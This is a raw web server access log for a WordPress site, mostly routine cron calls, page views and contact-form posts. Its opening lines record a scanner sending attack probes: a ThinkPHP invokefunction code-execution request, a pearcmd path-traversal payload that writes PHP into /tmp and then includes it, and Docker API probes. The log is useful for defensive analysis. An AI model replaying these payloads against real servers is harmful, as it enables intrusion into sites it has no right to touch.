92.55.190.215 - - [23/Aug/2025:06:43:32 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:34 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151669 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:37 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151669 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:39 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:40 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [23/Aug/2025:06:55:01 +0800] "POST /wp-cron.php?doing_wp_cron=1755903301.5017180442810058593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.90.45.104 - - [23/Aug/2025:06:55:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:07:16:36 +0800] "POST /wp-cron.php?doing_wp_cron=1755904596.2962059974670410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.26.165 - - [23/Aug/2025:07:16:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.26.165 - - [23/Aug/2025:07:16:40 +0800] "GET / HTTP/1.1" 200 33394 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Aug/2025:07:21:29 +0800] "POST /wp-cron.php?doing_wp_cron=1755904889.5774550437927246093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:07:21:29 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.89.70.31 - - [23/Aug/2025:07:29:03 +0800] "GET / HTTP/1.0" 200 165602 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
45.89.70.31 - - [23/Aug/2025:07:29:07 +0800] "GET /contacts/ HTTP/1.0" 200 78154 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [23/Aug/2025:07:29:09 +0800] "POST /wp-cron.php?doing_wp_cron=1755905349.8627140522003173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.31 - - [23/Aug/2025:07:29:11 +0800] "POST /contacts/ HTTP/1.0" 200 70692 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
